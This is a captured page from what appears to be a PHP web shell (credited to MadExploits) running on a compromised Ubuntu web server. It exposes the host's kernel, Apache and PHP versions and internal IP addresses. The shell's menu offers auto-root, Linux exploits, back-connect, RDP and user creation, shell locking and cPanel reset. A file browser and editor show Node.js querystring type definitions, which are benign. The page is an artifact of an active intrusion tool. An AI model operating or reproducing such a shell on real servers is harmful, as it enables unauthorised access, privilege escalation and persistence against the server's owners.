Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
@types /
node /
[ HOME SHELL ]
Name
Size
Permission
Action
assert
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
dns
[ DIR ]
drwxr-xr-x
fs
[ DIR ]
drwxr-xr-x
readline
[ DIR ]
drwxr-xr-x
stream
[ DIR ]
drwxr-xr-x
timers
[ DIR ]
drwxr-xr-x
ts5.6
[ DIR ]
drwxr-xr-x
LICENSE
1.11
KB
-rw-r--r--
README.md
1.5
KB
-rw-r--r--
assert.d.ts
43.57
KB
-rw-r--r--
async_hooks.d.ts
24.95
KB
-rw-r--r--
buffer.buffer.d.ts
21.89
KB
-rw-r--r--
buffer.d.ts
86.25
KB
-rw-r--r--
child_process.d.ts
68.12
KB
-rw-r--r--
cluster.d.ts
27.36
KB
-rw-r--r--
console.d.ts
20.75
KB
-rw-r--r--
constants.d.ts
816
B
-rw-r--r--
crypto.d.ts
185.42
KB
-rw-r--r--
dgram.d.ts
27.33
KB
-rw-r--r--
diagnostics_channel.d.ts
24.63
KB
-rw-r--r--
dns.d.ts
36.01
KB
-rw-r--r--
dom-events.d.ts
2.95
KB
-rw-r--r--
domain.d.ts
7.63
KB
-rw-r--r--
events.d.ts
42.13
KB
-rw-r--r--
fs.d.ts
184.8
KB
-rw-r--r--
globals.d.ts
13.37
KB
-rw-r--r--
globals.typedarray.d.ts
777
B
-rw-r--r--
http.d.ts
89.25
KB
-rw-r--r--
http2.d.ts
126.06
KB
-rw-r--r--
https.d.ts
24.23
KB
-rw-r--r--
index.d.ts
3.78
KB
-rw-r--r--
inspector.d.ts
194.19
KB
-rw-r--r--
module.d.ts
38.51
KB
-rw-r--r--
net.d.ts
46.59
KB
-rw-r--r--
os.d.ts
18.51
KB
-rw-r--r--
package.json
4.17
KB
-rw-r--r--
path.d.ts
8.04
KB
-rw-r--r--
perf_hooks.d.ts
37.68
KB
-rw-r--r--
process.d.ts
103.25
KB
-rw-r--r--
punycode.d.ts
5.35
KB
-rw-r--r--
querystring.d.ts
6.96
KB
-rw-r--r--
readline.d.ts
25.27
KB
-rw-r--r--
repl.d.ts
19
KB
-rw-r--r--
sea.d.ts
6.05
KB
-rw-r--r--
sqlite.d.ts
33.63
KB
-rw-r--r--
stream.d.ts
83.17
KB
-rw-r--r--
string_decoder.d.ts
2.76
KB
-rw-r--r--
test.d.ts
99.23
KB
-rw-r--r--
timers.d.ts
14.29
KB
-rw-r--r--
tls.d.ts
58.41
KB
-rw-r--r--
trace_events.d.ts
8.72
KB
-rw-r--r--
tty.d.ts
9.82
KB
-rw-r--r--
url.d.ts
41.7
KB
-rw-r--r--
util.d.ts
96.61
KB
-rw-r--r--
v8.d.ts
37.81
KB
-rw-r--r--
vm.d.ts
45.95
KB
-rw-r--r--
wasi.d.ts
7.75
KB
-rw-r--r--
worker_threads.d.ts
36.37
KB
-rw-r--r--
zlib.d.ts
25.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : querystring.d.ts
/** * The `node:querystring` module provides utilities for parsing and formatting URL * query strings. It can be accessed using: * * ```js * import querystring from 'node:querystring'; * ``` * * `querystring` is more performant than `URLSearchParams` but is not a * standardized API. Use `URLSearchParams` when performance is not critical or * when compatibility with browser code is desirable. * @see [source](https://github.com/nodejs/node/blob/v22.x/lib/querystring.js) */ declare module "querystring" { interface StringifyOptions { /** * The function to use when converting URL-unsafe characters to percent-encoding in the query string. * @default `querystring.escape()` */ encodeURIComponent?: ((str: string) => string) | undefined; } interface ParseOptions { /** * Specifies the maximum number of keys to parse. Specify `0` to remove key counting limitations. * @default 1000 */ maxKeys?: number | undefined; /** * The function to use when decoding percent-encoded characters in the query string. * @default `querystring.unescape()` */ decodeURIComponent?: ((str: string) => string) | undefined; } interface ParsedUrlQuery extends NodeJS.Dict<string | string[]> {} interface ParsedUrlQueryInput extends NodeJS.Dict< | string | number | boolean | bigint | ReadonlyArray<string | number | boolean | bigint> | null > {} /** * The `querystring.stringify()` method produces a URL query string from a * given `obj` by iterating through the object's "own properties". * * It serializes the following types of values passed in `obj`: [string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Data_structures#String_type) | * [number](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Data_structures#Number_type) | * [bigint](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt) | * [boolean](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Data_structures#Boolean_type) | * [string\[\]](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Data_structures#String_type) | * [number\[\]](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Data_structures#Number_type) | * [bigint\[\]](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt) | * [boolean\[\]](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Data_structures#Boolean_type) The numeric values must be finite. Any other input values will be coerced to * empty strings. * * ```js * querystring.stringify({ foo: 'bar', baz: ['qux', 'quux'], corge: '' }); * // Returns 'foo=bar&baz=qux&baz=quux&corge=' * * querystring.stringify({ foo: 'bar', baz: 'qux' }, ';', ':'); * // Returns 'foo:bar;baz:qux' * ``` * * By default, characters requiring percent-encoding within the query string will * be encoded as UTF-8\. If an alternative encoding is required, then an alternative `encodeURIComponent` option will need to be specified: * * ```js * // Assuming gbkEncodeURIComponent function already exists, * * querystring.stringify({ w: '䏿–‡', foo: 'bar' }, null, null, * { encodeURIComponent: gbkEncodeURIComponent }); * ``` * @since v0.1.25 * @param obj The object to serialize into a URL query string * @param [sep='&'] The substring used to delimit key and value pairs in the query string. * @param [eq='='] . The substring used to delimit keys and values in the query string. */ function stringify(obj?: ParsedUrlQueryInput, sep?: string, eq?: string, options?: StringifyOptions): string; /** * The `querystring.parse()` method parses a URL query string (`str`) into a * collection of key and value pairs. * * For example, the query string `'foo=bar&abc=xyz&abc=123'` is parsed into: * * ```json * { * "foo": "bar", * "abc": ["xyz", "123"] * } * ``` * * The object returned by the `querystring.parse()` method _does not_ prototypically inherit from the JavaScript `Object`. This means that typical `Object` methods such as `obj.toString()`, * `obj.hasOwnProperty()`, and others * are not defined and _will not work_. * * By default, percent-encoded characters within the query string will be assumed * to use UTF-8 encoding. If an alternative character encoding is used, then an * alternative `decodeURIComponent` option will need to be specified: * * ```js * // Assuming gbkDecodeURIComponent function already exists... * * querystring.parse('w=%D6%D0%CE%C4&foo=bar', null, null, * { decodeURIComponent: gbkDecodeURIComponent }); * ``` * @since v0.1.25 * @param str The URL query string to parse * @param [sep='&'] The substring used to delimit key and value pairs in the query string. * @param [eq='='] The substring used to delimit keys and values in the query string. */ function parse(str: string, sep?: string, eq?: string, options?: ParseOptions): ParsedUrlQuery; /** * The querystring.encode() function is an alias for querystring.stringify(). */ const encode: typeof stringify; /** * The querystring.decode() function is an alias for querystring.parse(). */ const decode: typeof parse; /** * The `querystring.escape()` method performs URL percent-encoding on the given `str` in a manner that is optimized for the specific requirements of URL * query strings. * * The `querystring.escape()` method is used by `querystring.stringify()` and is * generally not expected to be used directly. It is exported primarily to allow * application code to provide a replacement percent-encoding implementation if * necessary by assigning `querystring.escape` to an alternative function. * @since v0.1.25 */ function escape(str: string): string; /** * The `querystring.unescape()` method performs decoding of URL percent-encoded * characters on the given `str`. * * The `querystring.unescape()` method is used by `querystring.parse()` and is * generally not expected to be used directly. It is exported primarily to allow * application code to provide a replacement decoding implementation if * necessary by assigning `querystring.unescape` to an alternative function. * * By default, the `querystring.unescape()` method will attempt to use the * JavaScript built-in `decodeURIComponent()` method to decode. If that fails, * a safer equivalent that does not throw on malformed URLs will be used. * @since v0.1.25 */ function unescape(str: string): string; } declare module "node:querystring" { export * from "querystring"; }
Close